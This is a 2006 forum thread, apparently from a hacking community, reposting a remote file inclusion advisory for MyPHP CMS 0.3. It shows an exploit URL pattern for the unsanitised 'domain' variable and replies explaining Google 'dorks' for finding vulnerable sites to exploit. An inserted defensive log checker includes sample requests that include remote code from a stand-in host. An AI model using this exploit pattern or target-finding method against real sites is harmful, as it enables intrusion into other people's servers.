ghici Posted July 5, 2006

kw3rln told me to make this vulnerability public, since there aren't any sites anyway
http://www.xss-watch.org/teamwork/exploits...myphp%20cms.txt
it will be public on milw0rm soon

---------------------------------------------------------------------------
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : MyPHP CMS
version : latest version [ 0.3 ]
URL : http://sourceforge.net/projects/myphpcms
------------------------------------------------------------------
Exploit:
~~~~~~~~
Variable $domain not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
# /styles/default/global_header.php?domain=[Evil_Script]
http://www.site.com/[path]/styles/default/...n=[Evil_Script]
---------------------------------------------------------------------------
Solution :
~~~~~~~~~~
declare variable $domain
---------------------------------------------------------------------------
Shoutz:
~~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org and RST [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*
-------------------------------- [ EOF] ----------------------------------
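Added example, not part of the thread or of the advisory: a log check a site owner running MyPHP CMS could use to spot requests that set `domain` on `global_header.php` to a remote location. It assumes web server access logs in common/combined log format; the sample lines, IP addresses and the `example.invalid` host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path and parameter name come from the advisory; the rest is assumed.
TARGET_SUFFIX = "/styles/default/global_header.php"
PARAM = "domain"
# URL schemes and PHP stream wrappers that make an include target non-local.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data):", re.I)
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, example.invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jul/2006:10:00:00 +0000] "GET /cms/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jul/2006:10:01:12 +0000] "GET /cms/styles/default/'
    'global_header.php?domain=http://example.invalid/inc.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [05/Jul/2006:10:02:40 +0000] "GET /cms/styles/default/'
    'global_header.php?domain=http%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 312',
    '192.0.2.10 - - [05/Jul/2006:10:03:05 +0000] "GET /cms/styles/default/'
    'global_header.php?domain=example.com HTTP/1.1" 200 512',
]

def decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (double encoding hides '://')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for each remote-looking `domain` value."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not decode(parts.path).lower().endswith(TARGET_SUFFIX):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            value = decode(value)
            if REMOTE_RE.match(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tdomain={value}")
```

Access logs only show the query string; with register_globals=on the same variable can also arrive via POST or a cookie, which this check does not see.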
PsYKid Posted July 5, 2006

d0rk: keywords that Google uses, when you enter them, to find sites that have the script in question installed, so that it can be exploited in this case.
nos Posted July 5, 2006

he was asking what dork you have to put into Google, man